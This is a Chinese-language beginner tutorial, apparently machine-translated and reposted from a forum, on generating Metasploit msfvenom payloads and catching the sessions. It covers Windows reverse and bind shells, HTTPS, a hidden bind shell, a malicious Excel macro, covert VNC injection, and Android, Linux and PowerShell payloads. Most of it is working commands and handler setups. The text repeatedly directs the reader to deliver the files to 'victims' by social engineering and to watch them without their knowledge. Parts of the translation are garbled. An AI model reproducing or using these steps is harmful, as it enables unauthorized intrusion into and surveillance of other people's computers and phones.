Msfvenom初学者教程

你好朋友!!
今天我们将学习从名为metasploit的流行工具创建有效载荷,我们将探索工具中可用的各种选项,以创建具有不同扩展和技术的有效载荷。
Msfvenom
Msfvenom是Metasploit的命令行实例,用于生成和输出Metasploit中提供的所有各种类型的shell代码。
要求:
  • Kali Linux
  • Windows机器
  • Android手机
  • Linux机器
缩写
Lhost =(Kali的IP)
Lport =(您希望分配给侦听器的任何端口)
P =(Payload即Windows,android,PHP等)
F =文件扩展名(即windows = exe,android = apk等)
让我们开始!!
从Kali终端类型命令msfvenom如下所示。它将向您展示创建有效负载的所有可用选项,但在本文中,我们将讨论可以生成的不同类型的有效负载。
绑壳
绑定shell是在目标计算机上打开新服务的类型,需要攻击者连接到它才能获得会话
现在在kali终端上输入以下“命令”
msfvenom -p windows / meterpreter / bind_tcp -f exe> /root/Desktop/bind.exe
它将按照命令/root/Desktop/bind.exe中的指定将“exe”有效负载文件保存在桌面上我们需要通过文件共享或任何社会工程技术将此文件发送到受害者计算机并让它运行在系统
现在让我们启动msfconsole并输入以下命令来获取受害者机器的会话
msf>使用exploit / multi / handler
msf exploit(handler)> set payload windows / meterpreter / bind_tcp
msf exploit(handler)> set rhost IP 192.168.0.100
msf exploit(handler)> set lport 4444
msf exploit(处理程序)> exploit
一旦文件在机器上执行,我们将看到受害者机器仪表会话,如下所示:
bind_tcp选项有助于我们在受害计算机仍在运行时与受害计算机断开连接时,我们可以执行相同的命令并在没有受害者干预的情况下重新启动会话以再次运行攻击。
反向TCP有效负载
反向shell(也称为连接反向)正好相反:它要求攻击者首先在他的盒子上设置一个侦听器,目标机器充当连接到该侦听器的客户端,然后最终攻击者接收到贝壳。
从Kali终端类型命令msfvenom如下所示:
现在输入命令
msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.0.107 lport = 5555 -f exe> / root / Desktop / reverse_tcp.exe。
在这种情况下,我们将包括一些其他选项,如lhost(本地主机)和lport(本地端口),以从受害机器获得反向连接
生成有效负载并发送给受害者执行后,我们将开始下一步,如下所示
现在让我们启动msfconsole并输入以下命令来获取受害者机器的会话
msf>使用exploit / multi / handler
msf exploit(handler)> set payload windows / meterpreter / reverse_tcp
msf exploit(handler)> set lhost IP 192.168.0.107
msf exploit(handler)> set lport 5555
msf exploit(处理程序)> exploit
我们可以从下面的图像确认,一旦受害者执行了有效载荷,我们就会收到反向连接并成功完成了预备会话。
HTTPS有效负载
注意:如果我们在受害计算机上有相关端口处于活动状态,则可以使用上述两个有效负载,因此问题出现了如果受害者阻止了所有端口的情况?
那么在这种情况下,我们可以根据受害机器上运行的端口创建有效负载,例如443 for https:
让我们使用这种情况并使用https从Kali终端类型命令msfvenom创建有效负载,如下所示:
现在输入命令
msfvenom -p windows / meterpreter / reverse_https lhost = 192.168.0.107 lport = 443 -f exe> /root/Desktop/443.exe
生成有效负载并发送给受害者执行后,我们将开始下一步,如下所示
现在让我们启动msfconsole并输入以下命令来获取受害者机器的会话
msf>使用exploit / multi / handler
msf exploit(handler)> set payload windows / meterpreter / reverse_https
msf exploit(handler)> set lhost IP 192.168.0.107
msf exploit(handler)> set lport 443
msf exploit(处理程序)> exploit
我们可以从上面的图像确认,一旦受害者执行了有效载荷,我们就收到了反向连接,并得到了仪表预备会话。
隐藏绑定TCP有效负载
现在让我们探讨一下msfvenom Tool中可用的其他一些技术并尝试利用受害者机器,这次我们将获得受害者机器的shell而不是meterpreter session
让我们开始!!
这个有效负载在执行时以静默方式隐藏在后台,如果被任何端口扫描程序扫描,则不会显示其存在。
从Kali终端类型命令msfvenom如下所示:
msfvenom -p windows / shell_hidden_ bind_tcp ahost = 192.168.0.107 lport = 1010 -f exe> /root/Desktop/hidden.exe
生成有效负载并发送给受害者执行后,我们将开始下一步,如下所示。
我们使用Netcat来设置我们的监听器。
现在从kali终端让我们输入如上所示的命令
nc 192.168.0.100 1010
使用Netcat反向Shell有效负载
现在让我们做同样的过程并使用shell_reverse_tcp有效载荷,这是另一种获取受害者shell会话的技术
从Kali终端类型命令msfvenom如下所示:
msfvenom -p windows / shell_reverse_tcp ahost = 192.168.0.107 lport = 1111-f exe> /root/Desktop/ncshell.exe
生成有效负载并发送给受害者执行后,我们将开始下一步,如下所示
我们使用netcat设置我们的监听器,下面的图像确认了kali机器捕获的shell会话。
现在从kali终端让我们输入命令,如下所示。
nc -lvp 1111
宏有效负载
现在让我们使用Vba脚本创建一个有效负载,我们将使用它在Excel上创建一个宏来利用受害者机器。
让我们开始创建有效载荷!!
打开Kali终端并输入命令,如下所示:
msfvenom -p windows / meterpreter / reverse_tcp lhost = 192.168.0.107 lport = 7777 -f vba
执行命令后,将脚本从“#if vba 7”开始复制
现在让我们打开一个excel文件并按下alt + F11键打开VB脚本,您将看到如上所示的选项框,输入您想要提供的名称,然后单击“创建”。
您将获得上面的新选项框,单击“此工作簿”并将值替换为由msfvenom工具生成的复制的vb脚本有效内容,并关闭vb脚本编辑器并启用宏。
现在您可以使用相关数据起草您的excel文件,这些数据对于受害者打开文件可能看起来很现实,在我们的案例中,我们刚刚插入值“Test”保存文件并将其发送给受害者。
为了捕获会话,我们现在启动多处理程序,如下所述:
打开kali终端并输入msfconsole
msf>使用exploit / multi / handler
msf exploit(handler)> set paylaod windows / meterpreter / reverse_tcp
msf exploit(handler)> set lhost = 192.168.0.107
msf exploit(handler)> set lport = 7777
msf exploit(处理程序)> exploit
一旦受害者打开excel文件,它将提示受害者启用宏,一旦启用,我们的vbscript将被执行以向我们提供与受害者机器的反向连接,如下图所示。
VNC有效载荷
如果我们能够在他们不知情的情况下远离受害者机器并匿名观察他们的活动,那么这个有效载荷就是这样,那就不是很好了,让我们利用它来造福我们。
让我们开始创建有效载荷!! 打开Kali终端并输入命令,如下所示:
msfvenom -p windows / vncinject / reverse_tcp lhost = 192.168.0.107 lport = 5900 -f exe> /root/Desktop/vnc.exe
生成有效负载并发送给受害者执行后,我们将开始下一步,如下所示。为了捕获会话,我们现在启动多处理程序,如下所述:
打开kali终端并输入msfconsole
msf exploit(handler)>使用exploit / multi / handler
msf exploit(handler)> set paylaod windows / vncinject / reverse_tcp
msf exploit(handler)> set lhost 192.168.0.107
msf exploit(handler)> set lport = 5900
msf exploit(处理程序)> exploit
我们可以看到反向连接已经执行了VNC注入,并且在我们的显示远程桌面的kali机器上建立了受害者远程机器会话。
Android Payload
利用手持设备一直是热门话题,并且仍在继续,因此我们也将它包含在我们的文章中,让我们使用msfvenom工具中提供的android漏洞之一并将其用于我们的利益。
让我们开始
打开Kali终端并输入命令,如下所示:
msfvenom -p andriod / meterpreter / reverse_tcp lhost = 192.168.0.107 lport = 8888> /root/Desktop/file.apk

生成有效负载后,将其发送给受害者以在其掌上电脑上执行,并启动多处理程序,如下图所示。
msf>使用exploit / multi / handler
msf exploit(handler)> set payload android / meterpreter / reverse_tcp
msf exploit(handler)> set lhost 192.168.0.107
msf exploit(handler)> set lport 8888
msf exploit(处理程序)> exploit
一旦有效负载执行完毕,您将获得掌上电脑的meterpreter会话,该会话现在在您的控制之下
Linux Payload
打开Kali终端并输入命令,如下所示:
msfvenom -p linux / x86 / meterpreter / reverse_tcp lhost = 192.168.0.107 lport = 4444 -f elf> / root / Desktop / shell
生成有效负载后,将其发送给受害者以在其Linux机器上执行并启动多处理程序
msf>使用exploit / multi / handler
msf exploit(handler)> set payload linux / x86 / meterpreter / reverse_tcp
msf exploit(handler)> set lhost 192.168.0.107
msf exploit(handler)> set lhost 4444
msf exploit(处理程序)>运行
一旦有效负载被执行,它将在我们的kali机器上创建一个反向tcp连接,为我们提供meterpreter会话
Powershell Payload
打开Kali终端并输入命令,如下所示:
msfvenom -p cmd / windows / reverse_powershell lhost = 192.168.0.107 lport = 4444> /root/Desktop/shell.bat

生成有效负载后,将其发送给受害者,在其Windows机器上执行并启动多处理程序,如下图所示。
msf>使用multi / handler
msf exploit(handler) > set payload cmd / windows / reverse_powershell
msf exploit(handler)> set lhost 192.168.0.107
msf exploit(handler)> set lport 4444
msf exploit(处理程序)>运行
一旦有效负载执行,它将创建一个与shell的反向连接
转载请注明本文链接: http://www.mayidui.net/t2301.html
话题: 渗透
游客
登录后才可以回帖,登录 或者 注册